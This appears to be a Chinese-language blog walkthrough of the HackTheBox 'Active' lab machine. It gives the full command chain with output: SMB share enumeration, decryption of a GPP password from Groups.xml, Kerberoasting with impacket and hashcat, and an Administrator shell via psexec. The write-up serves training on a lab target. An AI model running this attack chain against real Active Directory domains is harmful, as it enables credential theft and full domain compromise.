起手式nmap偵查,53、88、135、139、389、445、464、593、636、3268、3269都有開,看來大概是Domain Controller。

------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.10.100
------------------------------------------------------------
Scanning target 10.10.10.100
Time started: 2024-01-27 01:14:49.238364
------------------------------------------------------------
Port 53 is open
Port 139 is open
Port 88 is open
Port 135 is open
Port 389 is open
Port 445 is open
Port 464 is open
Port 593 is open
Port 636 is open
Port 3268 is open
Port 3269 is open
Port 5722 is open
Port 9389 is open
Port 47001 is open
Port 49153 is open
Port 49154 is open
Port 49155 is open
Port 49157 is open
Port 49152 is open
Port 49158 is open
Port 49165 is open
Port 49170 is open
Port 49171 is open
Port scan completed in 0:01:20.539360
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p53,139,88,135,389,445,464,593,636,3268,3269,5722,9389,47001,49153,49154,49155,49157,49152,49158,49165,49170,49171 -sV -sC -T4 -Pn -oA 10.10.10.100 10.10.10.100
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------
Option Selection: 1
nmap -p53,139,88,135,389,445,464,593,636,3268,3269,5722,9389,47001,49153,49154,49155,49157,49152,49158,49165,49170,49171 -sV -sC -T4 -Pn -oA 10.10.10.100 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-27 01:16 EST
Nmap scan report for 10.10.10.100
Host is up (0.24s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-27T06:17:23
|_  start_date: 2024-01-27T06:11:27
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.18 seconds
------------------------------------------------------------
Combined scan completed in 0:02:49.167926
Press enter to quit...

把掃到的domain name給加進去:

┌──(kali㉿kali)-[~/HTB/active]
└─$ sudo -i                                                                
[sudo] password for kali: 
┌──(root㉿kali)-[~]
└─# echo "10.10.10.100 active.htb">> /etc/hosts 

┌──(root㉿kali)-[~]
└─# exit

zone transfer=>失敗

┌──(kali㉿kali)-[~/HTB/active]
└─$ host -l active.htb 10.10.10.100
Using domain server:
Name: 10.10.10.100
Address: 10.10.10.100#53
Aliases: 

Host active.htb not found: 5(REFUSED)
; Transfer failed.

┌──(kali㉿kali)-[~/HTB/active]
└─$ dig @10.10.10.100 AXFR active.htb            

; <<>> DiG 9.19.19-1-Debian <<>> @10.10.10.100 AXFR active.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

有開139、445,所以利用smbmap枚舉共用目錄,在無帳密的情況下加-H參數,可以列出哪些共享目錄是可讀的。

┌──(kali㉿kali)-[~/HTB/active]
└─$ smbmap -H active.htb                                                         

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                

[+] IP: 10.10.10.100:445    Name: active.htb              Status: Authenticated
    Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    ADMIN$                                                NO ACCESS    Remote Admin
    C$                                                    NO ACCESS    Default share
    IPC$                                                  NO ACCESS    Remote IPC
    NETLOGON                                              NO ACCESS    Logon server share 
    Replication                                           READ ONLY    
    SYSVOL                                                NO ACCESS    Logon server share 
    Users                                                 NO ACCESS

可知Replication這個目錄可讀,利用smbclient掛載,把看到的文件全部下載回來:

┌──(kali㉿kali)-[~/HTB/active]
└─$ smbclient //active.htb/Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

        5217023 blocks of size 4096. 277785 blocks available
smb: \> cd active.htb
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 06:37:44 2018
  Policies                            D        0  Sat Jul 21 06:37:44 2018
  scripts                             D        0  Wed Jul 18 14:48:57 2018

        5217023 blocks of size 4096. 277785 blocks available
smb: \active.htb\> recurse ON
smb: \active.htb\> prompt OFF
smb: \active.htb\> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (2.8 KiloBytes/sec) (average 0.7 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.5 KiloBytes/sec) (average 0.7 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (1.1 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.7 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \active.htb\> cd Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.5 KiloBytes/sec) (average 1.1 KiloBytes/sec)

發現有趣文件\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml

打開來看一下內容,發現有密碼,userName是svc_tgs:

Groups.xml由來:

GPP是Group Policy Preferences(組策略首選項)的縮寫,這是一個組策略實施工具。通過該工具,網絡管理員可以實現更多的網絡管理,如驅動映射、添加計劃任務、管理本地組和用戶。其中最常用的功能就是遠程創建本地賬戶。在創建過程中,會在目標主機傳送一個Groups.xml文件。該文件中保存這創建的用戶名和加密的密碼。該加密的密碼采用對稱加密。
該文件是通過網絡傳輸到目標主機的。通過數據抓包,就可以截獲該文件。然後使用Kali Linux提供工具gpp-decrypt來破解該密碼。工具gpp-decrypt是一個Ruby腳本,可以直接破解GPP加密的密碼。

┌──(kali㉿kali)-[~/HTB/active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

smbmap在有帳密的情況下,加域名(-d)才能列出各目錄是否可存取!!,svc_tgs可讀的目錄變多了:

┌──(kali㉿kali)-[~/HTB/active]
└─$ smbmap -u svc_tgs -p GPPstillStandingStrong2k18 -d active.htb -H 10.10.10.100

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                

[+] IP: 10.10.10.100:445    Name: active.htb              Status: Authenticated
    Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    ADMIN$                                                NO ACCESS    Remote Admin
    C$                                                    NO ACCESS    Default share
    IPC$                                                  NO ACCESS    Remote IPC
    NETLOGON                                              READ ONLY    Logon server share 
    Replication                                           READ ONLY    
    SYSVOL                                                READ ONLY    Logon server share 
    Users                                                 READ ONLY

掛載其中的Users目錄,把裡面有趣的檔案user.txt載回來:

┌──(kali㉿kali)-[~/HTB/active]
└─$ smbclient //10.10.10.100/Users -U active.htb/svc_tgs
Password for [ACTIVE.HTB\svc_tgs]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

        5217023 blocks of size 4096. 279096 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> dir
  .                                   D        0  Sat Jul 21 11:16:32 2018
  ..                                  D        0  Sat Jul 21 11:16:32 2018
  Contacts                            D        0  Sat Jul 21 11:14:11 2018
  Desktop                             D        0  Sat Jul 21 11:14:42 2018
  Downloads                           D        0  Sat Jul 21 11:14:23 2018
  Favorites                           D        0  Sat Jul 21 11:14:44 2018
  Links                               D        0  Sat Jul 21 11:14:57 2018
  My Documents                        D        0  Sat Jul 21 11:15:03 2018
  My Music                            D        0  Sat Jul 21 11:15:32 2018
  My Pictures                         D        0  Sat Jul 21 11:15:43 2018
  My Videos                           D        0  Sat Jul 21 11:15:53 2018
  Saved Games                         D        0  Sat Jul 21 11:16:12 2018
  Searches                            D        0  Sat Jul 21 11:16:24 2018

        5217023 blocks of size 4096. 279096 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Sat Jan 27 01:12:29 2024

        5217023 blocks of size 4096. 279096 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit

┌──(kali㉿kali)-[~/HTB/active]
└─$ cat user.txt 
b084f0493ed51d199dd04e53038ce441

先不理這個檔案,先來做做Kerberoasting攻擊:

┌──(kali㉿kali)-[~/HTB/active]
└─$ impacket-GetUserSPNs -request 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -outputfile kerboast.out
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2024-01-27 01:12:32.133345             



[-] CCache file is not found. Skipping...

┌──(kali㉿kali)-[~/HTB/active]
└─$ cat kerboast.out 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$1e3f2e2c882852173901084f7d21fc7a$5c2248feb26fc0dcdd2778faf88548059fdfb1279b08065e796a17e10dd3da84cb951ec1fde6e79995fc5bf999d38e8a5bc1aa25d3c7ea03b8a0c620453d594ff9183496f9621968c9d52bf4d14954699476725a3059fca7ceb1549e604f40acbfafcf5d3aca93d3587ebb7c654af68bae56488d049759b5265ad4add53c4238b83c67e6fd927a4a213253e5d4c3c143f0d14e672cd225594f4a033cd712518402081676fe9d2364fe3e95e09542a3d91978e5c666dabe195473e986d123c5a4d6e3af15688a50f29fe066bec81516cc609b6be42751203545ca73c5161d33a23a647b214850c3d77304446f2120e528a99b7f78a042022a4620021398d5e331c788e6e1492da24874505518cb7ca4f2a341f063b64ad1e2e53f2d2b991fd18e8f1c2bb7fedd1a4acac629a5efc8163f7664fcec5d79dfbbe1ff735b94b76bb6fbc41512e0b26bc49643ab3a18cc6ca018505d85554fba495a2125926b807dde51451586cfe186156744b6550e32c4afb9693e3fde609b65c67638209ba0c0622e0d0096cba90c847106f39da75bd786b523103cf6ee1ce7ff8b81bd136c37d65d9ce58047417e48c925e7954dadba623f1c59db71b36729327fe7b5a36d158a50821ad5b6a0b0185a22318a44f77b5c8d73b2f90eadc55934a91c41c3a7398e27ced83a009841a900bd95c1bc95269d674b75706a63c0d8b16cdadc2fae5a700f469cd6b09b65e8a4c6d0f4e77c7359c47b088858982135fe1236c4d210f30cab313823a3fac8b2578cd9019cfdc53e38d74e5f1f9199e6c42dafff6f24c7dd0aef82b4e5f2a3d4c079ac7ddbc2f17d529f3333af1959588b4ace641fa98afef83317e75bbac39ba54ff84480e53dc453398cf59b98987bd55dcedbc90720a5f4c00140fd6b6f8b15955718c7f670477501f8fdf1e6502feaca195115c688270ed5f6ee4e42d48f434fb3e7c3037c5c12eab36df3ab002005f01edd3211982e57d0c6340e6dc6f87516aa742bb24a4ee6697bfd341ded21d1abf09b5ab1c082f8c9706dd73a67f6b071aaa4f00dfb6c97f8c80aa7e3e22c780269e8268f45c2b53dc814af0b014b882c27a8913d0dafd4e7375e05f5bebf182aea397d556b1636aa1ebb81171c5115c54b748f3b4047148c0256607f788655827d255bdb7df47af912f25ab8ae49e9b91f7bbd0596cdd21c228b815018c00385ec8c6b9007aa704bce76c22925cd93715ea33d09b04f693e539ffc87d6419270

┌──(kali㉿kali)-[~/HTB/active]
└─$ hashcat -m 13100 kerboast.out /usr/share/wordlists/rockyou.txt    
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i5-10400 CPU @ 2.90GHz, 2913/5891 MB (1024 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$1e3f2e2c882852173901084f7d21fc7a$5c2248feb26fc0dcdd2778faf88548059fdfb1279b08065e796a17e10dd3da84cb951ec1fde6e79995fc5bf999d38e8a5bc1aa25d3c7ea03b8a0c620453d594ff9183496f9621968c9d52bf4d14954699476725a3059fca7ceb1549e604f40acbfafcf5d3aca93d3587ebb7c654af68bae56488d049759b5265ad4add53c4238b83c67e6fd927a4a213253e5d4c3c143f0d14e672cd225594f4a033cd712518402081676fe9d2364fe3e95e09542a3d91978e5c666dabe195473e986d123c5a4d6e3af15688a50f29fe066bec81516cc609b6be42751203545ca73c5161d33a23a647b214850c3d77304446f2120e528a99b7f78a042022a4620021398d5e331c788e6e1492da24874505518cb7ca4f2a341f063b64ad1e2e53f2d2b991fd18e8f1c2bb7fedd1a4acac629a5efc8163f7664fcec5d79dfbbe1ff735b94b76bb6fbc41512e0b26bc49643ab3a18cc6ca018505d85554fba495a2125926b807dde51451586cfe186156744b6550e32c4afb9693e3fde609b65c67638209ba0c0622e0d0096cba90c847106f39da75bd786b523103cf6ee1ce7ff8b81bd136c37d65d9ce58047417e48c925e7954dadba623f1c59db71b36729327fe7b5a36d158a50821ad5b6a0b0185a22318a44f77b5c8d73b2f90eadc55934a91c41c3a7398e27ced83a009841a900bd95c1bc95269d674b75706a63c0d8b16cdadc2fae5a700f469cd6b09b65e8a4c6d0f4e77c7359c47b088858982135fe1236c4d210f30cab313823a3fac8b2578cd9019cfdc53e38d74e5f1f9199e6c42dafff6f24c7dd0aef82b4e5f2a3d4c079ac7ddbc2f17d529f3333af1959588b4ace641fa98afef83317e75bbac39ba54ff84480e53dc453398cf59b98987bd55dcedbc90720a5f4c00140fd6b6f8b15955718c7f670477501f8fdf1e6502feaca195115c688270ed5f6ee4e42d48f434fb3e7c3037c5c12eab36df3ab002005f01edd3211982e57d0c6340e6dc6f87516aa742bb24a4ee6697bfd341ded21d1abf09b5ab1c082f8c9706dd73a67f6b071aaa4f00dfb6c97f8c80aa7e3e22c780269e8268f45c2b53dc814af0b014b882c27a8913d0dafd4e7375e05f5bebf182aea397d556b1636aa1ebb81171c5115c54b748f3b4047148c0256607f788655827d255bdb7df47af912f25ab8ae49e9b91f7bbd0596cdd21c228b815018c00385ec8c6b9007aa704bce76c22925cd93715ea33d09b04f693e539ffc87d6419270:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...419270
Time.Started.....: Sat Jan 27 06:15:19 2024 (20 secs)
Time.Estimated...: Sat Jan 27 06:15:39 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   533.2 kH/s (0.90ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10537472/14344385 (73.46%)
Rejected.........: 0/10537472 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Tiana87
Hardware.Mon.#1..: Util:100%

Started: Sat Jan 27 06:15:17 2024
Stopped: Sat Jan 27 06:15:41 2024

但爆出來的密碼無法用evil-winrm登入,看來是沒有在remaote management users這個group裡:

┌──(kali㉿kali)-[~/HTB/active]
└─$ evil-winrm -i 10.10.10.100 -u Administrator -p Ticketmaster1968              

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.100" port 5985 (10.10.10.100:5985)

Error: Exiting with code 1

不能用evil-winrm的替代方案,impacket-psexec :

┌──(kali㉿kali)-[~/HTB/active]
└─$ impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file SjfTAGAY.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service axNh on 10.10.10.100.....
[*] Starting service axNh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
3e82d739f6e44a4e08df8e952f56a3c0

Reference

https://sanaullahamankorai.medium.com/hackthebox-active-walkthrough-83b87bae691b

https://medium.com/@joemcfarland/hack-the-box-active-writeup-a37a1c170cf6

https://blog.csdn.net/nzjdsds/article/details/85010136


#zone transfer指令 #共享目錄枚舉-使用smbmap(可輸出目錄權限) #共享目錄枚舉-使用smbclient(有域名、無IP、有目錄、無帳號) #Groups.xml破密-使用gpp-decrypt #共享目錄枚舉-使用smbmap(有域名、有IP、有帳號、有密碼、可輸出目錄權限) #共享目錄掛載-使用smbclient(有域名、有IP、有帳號、有目錄) #Kerberoasting-使用GetUserSPNs(已知某帳號及其密碼、輸出至文件) #windows提權與登入-psexec







Related Posts

[重新理解C++] 從 function object 理解惰性編譯

[重新理解C++] 從 function object 理解惰性編譯

Vue 元件 : Props in & Emit out

Vue 元件 : Props in & Emit out

Web開發學習筆記21 — RESTful Routes

Web開發學習筆記21 — RESTful Routes


Comments